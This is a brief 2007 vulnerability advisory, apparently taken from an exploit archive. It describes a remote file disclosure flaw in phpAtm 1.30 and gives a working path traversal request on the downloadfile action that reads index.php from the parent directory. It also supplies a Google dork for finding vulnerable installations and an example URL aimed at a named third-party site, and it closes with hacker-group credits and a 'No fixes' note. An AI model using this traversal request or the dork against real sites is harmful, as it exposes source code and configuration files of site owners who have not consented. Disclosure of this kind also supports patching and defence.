phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability

2007-05-13 00:00:00

******************************************************************************************
download page in : http://phpatm.free.fr/

bug in : phpatm
injection attack :
index.php?action=downloadfile&filename=index.php&directory=../&

Dork in google : "powered by php advanced transfer manager"

example : http://www.furytech.net/phpATM_130/index.php?action=downloadfile&filename=index.php&directory=../
*******************************************************************************************
************************************************************************************
found bug by : Ali.Mohajem
Email : [email protected]
Website : wWw.Shayatin-team.com
www.mohajem.net
www.mohajem.org
special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers
*************************************************************************************

#

Fixes

No fixes

In order to submit a new fix you need to be registered.